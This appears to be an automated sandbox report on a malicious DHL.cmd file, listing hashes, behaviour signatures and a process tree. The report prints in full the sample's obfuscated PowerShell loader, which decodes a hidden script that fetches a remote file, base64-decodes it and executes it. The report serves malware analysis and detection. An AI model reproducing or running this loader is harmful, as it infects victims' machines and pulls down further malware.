Analysis
max time kernel: 148s
max time network: 150s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 12-07-2024 09:34
Static task: static1
Behavioral task: behavioral1
  Sample: DHL.cmd
  Resource: win7-20240704-en
  5 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: DHL.cmd
  Resource: win10v2004-20240709-en
  18 signatures, 150 seconds
General
Target: DHL.cmd
Size: 6KB
MD5: 4fac338e225a33e53806bf2f27f3ed0e
SHA1: 5e7f1620ebe0099e2c7014b2e725eefbdaecab85
SHA256: 1825ea48164cc22c0872fea1d7ed7698d8ac439c8404207db2234cdc2b95f1ba
SHA512: cdeee8abcf1153740d8d1c0cc82c23c2f4b71fb6335b4fa1c3c5bf4838a0186f8043b3b5223c8d13c62c777be7cb8df2ef12a617485cdf61c527e2d5f5888844
SSDEEP: 192:YWFEaVQEQKcwglcCy6XnU/pTmAaelT2dvmf:ThuZXGCyWU/praeIdvW
Score: 8/10
Malware Config
Signatures
- Blocklisted process makes network request (58 IoCs)
  Processes (flow, pid, process): flows 3 through 60, all from PID 2496 powershell.exe (58 flows)
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run Powershell and hide display window.
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes (pid, process): 2496 powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description, pid, process): Token: SeDebugPrivilege, 2496 powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (description, pid, process, target process):
    PID 3056 wrote to memory of 2496: 3056 cmd.exe -> 2496 powershell.exe (3 times)
    PID 2496 wrote to memory of 2756: 2496 powershell.exe -> 2756 cmd.exe (3 times)
Processes
C:\Windows\system32\cmd.exe (PID 3056, depth 1)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"
  - Suspicious use of WriteProcessMemory
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. 
Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. 
Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. 
PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"2⤵
  (powershell.exe, PID 2496, depth 2, child of PID 3056)
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (PID 2756, depth 3, child of PID 2496)
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"